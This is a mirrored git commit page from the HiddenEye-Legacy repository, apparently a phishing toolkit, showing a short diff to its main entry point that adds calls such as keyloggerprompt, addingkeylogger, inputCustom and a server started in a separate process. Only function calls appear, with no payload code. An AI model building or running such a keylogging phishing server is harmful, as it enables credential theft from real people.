mirror of
https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git
synced 2024-03-22 21:12:55 +08:00
v.0.2.6 - RELEASED
This commit is contained in:
parent
e219ea75e5
commit
86c2c62573
@ -24,12 +24,14 @@ readConfig()
|
||||
if __name__ == "__main__":
|
||||
try:
|
||||
runMainMenu()
|
||||
|
||||
mainMenu()
|
||||
|
||||
keyloggerprompt()
|
||||
addingkeylogger()
|
||||
|
||||
inputCustom()
|
||||
##############
|
||||
runServer()
|
||||
selectServer()
|
||||
|
||||
multiprocessing.Process(target=runServer).start()
|
||||
|
Loading…
x
Reference in New Issue
Block a user